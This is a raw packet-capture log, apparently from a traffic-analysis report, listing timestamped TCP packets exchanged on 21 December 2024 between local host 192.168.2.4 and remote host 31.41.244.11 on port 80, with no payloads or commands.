                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.293802023 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.293817043 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.293878078 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.293996096 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.294883966 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.294941902 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.295031071 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.295084000 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.296107054 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.296159983 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.296308041 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.296356916 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.297226906 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.297280073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.297396898 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.297442913 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.298428059 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.298677921 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.298721075 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.299623013 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.299760103 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.299807072 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.300774097 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.300910950 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.300967932 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.301953077 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.302000999 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.302107096 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.302146912 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.303268909 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.303323984 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.303390980 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.303433895 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.304339886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.304389000 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.304476023 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.305500031 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.305571079 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.305639029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.305681944 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.306703091 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.306866884 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.306921959 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.307818890 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.307884932 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.308054924 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.308099031 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.309096098 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.309154987 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.309237957 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.309281111 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.310254097 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.310339928 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.310380936 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.310420990 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.311382055 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.311436892 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.311525106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.311660051 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.312535048 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.312728882 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.312832117 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.313750982 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.313813925 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.313863039 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.313903093 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.314867973 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.314924955 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.315031052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.315076113 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.316104889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.316174030 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.316258907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.316380024 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.317243099 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.317302942 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.317414045 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.317603111 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.318451881 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.318512917 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.318620920 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.318665981 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.319578886 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.319642067 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.319787979 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.319833040 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.320764065 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.320935011 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.321224928 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.321933031 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.321990967 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.322084904 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.322127104 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.323169947 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.323230028 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.323297024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.323339939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.324326992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.324382067 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.324465990 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.324671984 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.325615883 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.325675011 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.325951099 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.326174021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.326677084 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.326751947 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.326870918 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.326967955 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.327821016 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.327915907 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.327999115 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.328110933 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.329019070 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.329076052 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.329232931 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.329277039 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.330178022 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.330257893 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.330415010 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.330717087 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.331358910 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.331551075 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.331614971 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.332570076 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.332665920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.332685947 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.332796097 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.333656073 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.333703041 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.464134932 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.464225054 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.464313984 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.464356899 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.464668989 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.464787006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.464848042 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.465854883 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.466300011 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.466355085 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.466412067 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.466522932 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.467468023 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.467524052 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.467588902 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.467631102 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.468607903 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.468738079 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.468781948 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.469803095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.469860077 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.469944000 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.470127106 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.470997095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.471048117 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.471160889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.471200943 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.472153902 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.472206116 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.472258091 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.472301006 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.473357916 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.473428011 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.473460913 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.473505020 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.474566936 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.474646091 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.474662066 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.474688053 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.475814104 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.475871086 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.475872040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.475914955 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.476862907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.476907969 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.476982117 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.477207899 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.478059053 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.478108883 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.478200912 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.478243113 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.479211092 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.479341984 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.479387999 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.480427980 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.480479956 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.480551958 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.480598927 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.481594086 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.481659889 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.481712103 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.481888056 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.482779026 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.482969999 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.482996941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.483038902 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.483918905 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.483987093 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.484021902 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.484064102 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.485163927 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.485234976 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.485280991 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.485342026 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.486291885 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.486335993 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.486470938 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.486665010 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.487477064 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.487548113 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.487629890 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.487677097 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.488620996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.488666058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.488765955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.488810062 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.489804029 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.489849091 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.489912987 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.489952087 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.491029024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.491079092 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.491148949 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.491195917 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.492206097 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.492258072 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.492285013 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.492324114 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.493382931 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.493424892 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.493535042 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.493583918 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.494512081 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.494569063 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.494635105 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.494739056 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.495724916 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.495796919 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.495817900 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.495934010 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.496886015 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.496928930 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.497003078 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.497041941 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.498071909 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.498114109 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.498229980 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.498272896 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.499249935 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.499433041 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.499440908 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.499480963 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.500411987 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.500458002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.500601053 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.500677109 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.501594067 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.501652002 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.501718998 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.501867056 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.502794027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.502846003 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.502960920 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.503030062 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.503982067 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.504029036 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.504105091 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.504148006 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.505115986 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.505177975 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.505254030 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:36.505377054 CET4979780192.168.2.431.41.244.11
